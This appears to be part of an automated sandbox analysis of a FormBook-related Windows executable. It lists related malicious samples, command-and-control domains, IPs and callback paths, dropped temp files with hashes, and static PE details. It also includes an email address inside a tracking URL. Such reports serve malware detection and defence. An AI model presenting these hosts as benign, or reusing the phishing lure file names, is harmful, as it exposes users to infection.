104.21.45.56	NEW ORDER 75647839384.exe	Get hash	malicious	FormBook	Browse
194.9.94.85	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/5m4b/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	ORDER TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	D7KV2Z73zC.rtf	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.sandranoll.com	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
www.dmtxwuatbz.cc	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Attendance list.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Swift Copy #U00a362,271.03.Pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	PO-104678522.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	NEW ORDER-RFQ#10112023Q4.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	NEW ORDER 75647839384.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
www.anuts.top	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Attendance list.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	2OdHcYtYOMOepjD.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Tekstlinie.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	dMY6QiHAIpPPqiV.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
www.xn--matfrmn-jxa4m.se	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	D7KV2Z73zC.rtf	Get hash	malicious	FormBook	Browse	194.9.94.85
	Scan Doc.docx.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
www.catherineviskadi.com	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	Attendance list.exe	Get hash	malicious	FormBook	Browse	217.160.0.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Fu46158161.ct.sendgrid.net%2Fls%2Fclick%3Fupn%3Du001.StSodu0PS4xAHWUBPquypwV5wfYj-2BYPO5jgxW7H-2BzbHXbljXTXa-2Ba-2FbnNOYrl3vEGvGdZ1-2Fmedbg5aL5gqsfgg-3D-3D-iq0_U0GJ9nS0LXxA90QWOrFU6BEjTxHjgHI7SyliqFAoIPazyWCw8kNx7h-2B7Nm43fBbjvsLC5mwKsBNg0Js3MFxkKOSbvLpJXtTq0DbiIqTEnwUAQH3V-2FXh8eVjoO84ITvJFxz419-2BxAAA1Q8qsnl4-2FM0V-2Fw-2FjP6XRmj2niRa0XxBNyd0RY3vOjEkPYA1M3pFYdJWN1fk8rSwYdDg5iDa4wOnhinXgFExuyBXXr558NemPOS4iuHfpt6cFvkDjht8-2BPI1JGHd7bTACfl2dKqnM1jkTA-2BmP2QG4bDvt8s5e-2BNfOq6P0LPacl65EHPu-2By2faLrwwCwM-2FKfTn7-2BNHzouWQK3CZZHArSj2-2FKR3Wfy3-2ByBk1XsUzdEF0Hcomlq-2FkELjPlN7MSBPk8f2uUQzKdMqDNDG0BsmvrmvOHt5euz0jvt0p2qi6M8eAvmXLtiIOmlyegtJn0YsHRyexAnl1FtSmi40PXLB-2B6U-2BarucnyrXMzNzFXUsSbMNjnjssFtzjb0JpfsHmXaXa-2FbejS7xb72VHIIaGbyUVHoSNy8XaLYwpVDk1-2BJywbLWdf2EyEcrQ1py-2Fg5-2BOF-2FSSMEcXI8CBRaby4dauecrmfq3OKC4-2Flj71pt4-2B-2B5F1nFgbpjz-2FZBsVhO9gX7OIcYvc2E4-2BzJPKTEHu2GyJalVKlBPouxIdbGrhcrpu09dXzPU8BgAiKlVOXQ6ZEYX1DziiKD5adbWnpdKRU9NutVNRH8BAlwfrrzcTNz6cuEM7-2BN24rT5ykoQKdGynALSjegtiUVzsTKGZITBxwBb-2BZ5N3-2FtrLPggIM6KloCFL5DxZmF7Ko6oqzp0T62F62Pbk24625cuFfwUnZePGHr8VmFwc0MjDwGa87E5Y1s-2FI-3D&E=sbarker%40greenvillefederal.com&X=XID907CHimbC6204Xd2&T=GRVL&HV=U,E,X,T&H=322ee00ce9d3e9a38047f309f74981f70ea72abf	Get hash	malicious	Unknown	Browse	104.17.25.14
	SPECIFICATIONS AND DRAWING.docx	Get hash	malicious	Unknown	Browse	104.21.90.242
	Payment Advice_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	elton.exe	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer, PureLog Stealer	Browse	104.21.33.109
	SecuriteInfo.com.Win64.Malware-gen.11158.6655.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	elton.exe	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer, PureLog Stealer	Browse	104.21.16.74
	fKYrTm48vZ.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.69.39
	http://pub-09a55f0b5ac14dbbbc79ab40abc0b630.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://pub-1cde9c3ed013443ba04ecdf1f32d496c.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://pub-a0a450c9d8be473e97d3efab500320f7.r2.dev/index.html	Get hash	malicious	Unknown	Browse	162.159.134.53
DOMAINTECHNIKAT	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
VPSQUANUS	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	1.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
PROVIDERBOXIPv4IPv6DUS1DE	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	RAbSVWi6Lh.elf	Get hash	malicious	Mirai	Browse	91.206.143.156
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	93.90.186.36
	5Jan3SztHt.elf	Get hash	malicious	Unknown	Browse	5.44.126.238
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	Attendance list.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	5.44.111.104
LOOPIASE	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	http://tok2np0cklt.top/	Get hash	malicious	Unknown	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85

Process:	C:\Windows\SysWOW64\clip.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autD2A9.tmp

Download File

Process:	C:\Users\user\Desktop\MV Sunshine, ORDER.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994661897514812
Encrypted:	true
SSDEEP:	6144:WAz0p8gLA+2QqFAd67JtVxxHTHEiHjBa74oD0mS2Mg25r2fxPhw:xgp8OrqFlJtDpTHEyjBa0n4f25r25Zw
MD5:	4E2A8F508B892048920CB5F1A50F7551
SHA1:	2542954F1007EA884A8D63043B6F67D94BF2FFF1
SHA-256:	5E779D8DC0DDF290AB88CC5A6210A2D4EE738B835D84A5C7A8A7A1698C7580EF
SHA-512:	6FB1C638A4A7BB7D5411AC644E434027A0991F4011503896A2B1395C088AD56EA1C8E2196735F44BCB0E08F8252BD26417ADC5624C34A9F05554B2F4DE951563
Malicious:	false
Reputation:	low
Preview:	..}k.8H6A..._......JM..qQ0..H6AH97VJC2N3IJNJNBYR89F8H6AH97.JC2@,.DN.G.x.9u...^(;.G$%$@/^i)/$ --rZ\fJ=Xa!W.....#\-/`GCH}R89F8H68I0.k$.sS..s).C...\|X/.[..j$.T..r)..;[Q{X/.AH97VJC2.vIJ.KOBH..YF8H6AH97.JA3E2BJNZJBYR89F8H6a]97VZC2N.MJNJ.BYB89F:H6GH97VJC2H3IJNJNBYr<9F:H6AH97TJ..N3YJNZNBYR(9F(H6AH97FJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBw&]A28H6.G=7VZC2N#MJNZNBYR89F8H6AH97vJCRN3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2

C:\Users\user\AppData\Local\Temp\autD2D9.tmp

Download File

Process:	C:\Users\user\Desktop\MV Sunshine, ORDER.exe
File Type:	data
Category:	dropped
Size (bytes):	9784
Entropy (8bit):	7.634569270872405
Encrypted:	false
SSDEEP:	192:CZIUd07023mEBuHJLzyvek8KIqvJK92pzi4kR7WXZDZb/2CnE9:Yd07ZuhzEeoIqvJKwklW5ZT/nE9
MD5:	9B50378F2912AE42FFE42B464F23D65E
SHA1:	20417AA75ACE5CD4F66198B6E299A6AE1124A1B5
SHA-256:	5F0716B312685EA484E95D17F12493BF99C24B19174FD46F35BE051977AA7472
SHA-512:	2047874AA1B5BADF37BE66B83D0BEBC4AC7B7E145E3B5DD60A2B942E6A2E4394102C85BBBE8ABB46B09BB97AE77AEF61E1AFFF9DA178759F6FDFB1088196A50E
Malicious:	false
Reputation:	low
Preview:	EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........\|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3\|vY..G.6.Yf.8_..oe..i\|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...

C:\Users\user\AppData\Local\Temp\preconform

Download File

Process:	C:\Users\user\Desktop\MV Sunshine, ORDER.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994661897514812
Encrypted:	true
SSDEEP:	6144:WAz0p8gLA+2QqFAd67JtVxxHTHEiHjBa74oD0mS2Mg25r2fxPhw:xgp8OrqFlJtDpTHEyjBa0n4f25r25Zw
MD5:	4E2A8F508B892048920CB5F1A50F7551
SHA1:	2542954F1007EA884A8D63043B6F67D94BF2FFF1
SHA-256:	5E779D8DC0DDF290AB88CC5A6210A2D4EE738B835D84A5C7A8A7A1698C7580EF
SHA-512:	6FB1C638A4A7BB7D5411AC644E434027A0991F4011503896A2B1395C088AD56EA1C8E2196735F44BCB0E08F8252BD26417ADC5624C34A9F05554B2F4DE951563
Malicious:	false
Reputation:	low
Preview:	..}k.8H6A..._......JM..qQ0..H6AH97VJC2N3IJNJNBYR89F8H6AH97.JC2@,.DN.G.x.9u...^(;.G$%$@/^i)/$ --rZ\fJ=Xa!W.....#\-/`GCH}R89F8H68I0.k$.sS..s).C...\|X/.[..j$.T..r)..;[Q{X/.AH97VJC2.vIJ.KOBH..YF8H6AH97.JA3E2BJNZJBYR89F8H6a]97VZC2N.MJNJ.BYB89F:H6GH97VJC2H3IJNJNBYr<9F:H6AH97TJ..N3YJNZNBYR(9F(H6AH97FJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBw&]A28H6.G=7VZC2N#MJNZNBYR89F8H6AH97vJCRN3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2

C:\Users\user\AppData\Local\Temp\supergroups

Download File

Process:	C:\Users\user\Desktop\MV Sunshine, ORDER.exe
File Type:	FGDC-STD-001-1998
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5854309016086123
Encrypted:	false
SSDEEP:	768:PQKGjwsMMIfexWN+m2cJ9soGbLph1jXtAP:PRhsMffexWEXtg
MD5:	66DF8D943FB7524F2C217CA743A00AF8
SHA1:	37ACD52CF6A2271DAD61261D944649425EE5AA27
SHA-256:	426BD89EDCB1A56CEA3A61B05961D720E7C7DF002E7FB8008626772AC1DCF5CD
SHA-512:	D5B8F50E4DF27D9DEF1D34AF48F8DB820C9B119BB52FECD4C886E8559247F90585F3F7B65A769375CD710272E97A958D64E8B43122A6BFAA5F28EE675598E2CA
Malicious:	false
Reputation:	low
Preview:	2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.214171798533215
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MV Sunshine, ORDER.exe
File size:	1'259'008 bytes
MD5:	fbc68c0b27f383eeb5177a01d2464b74
SHA1:	33ce6d297f5039c828f21d17c1ac6acde4b0153c
SHA256:	8dddd8491db05ec4904bb6b6fd63ac5412b23fd89cefbf1b3c5ca74325615e8e
SHA512:	46a746470f8dd59ede26e25fe43f15ba094d39f1db0498aac9b4f349524eb856d79ba3dd92351e46cb32b6ef13a31437c677ee4ee3420be7de72d3bf4cb54452
SSDEEP:	24576:cAHnh+eWsN3skA4RV1Hom2KXMmHauTNv9rYCbgZH1FtsV5:7h+ZkldoPK8YauTUCbOH1Fti
TLSH:	3545BE0273D1C036FFAB92739B6AF24556BD79254133852F13982DB9BD701B2223E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B921D9 [Sun Aug 11 20:40:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F63E481340Dh
jmp 00007F63E48061C4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F63E480634Ah
cmp edi, eax
jc 00007F63E48066AEh
bt dword ptr [004C41FCh], 01h
jnc 00007F63E4806349h
rep movsb
jmp 00007F63E480665Ch
cmp ecx, 00000080h
jc 00007F63E4806514h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F63E4806350h
bt dword ptr [004BF324h], 01h
jc 00007F63E4806820h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F63E48064EDh
test edi, 00000003h
jne 00007F63E48064FEh
test esi, 00000003h
jne 00007F63E48064DDh
bt edi, 02h
jnc 00007F63E480634Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F63E4806353h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F63E48063A5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x68e90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x131000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x68e90	0x69000	69eb280e6fbbe08b18d483a2318c294b	False	0.9371372767857142	data	7.9142996288869245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x131000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
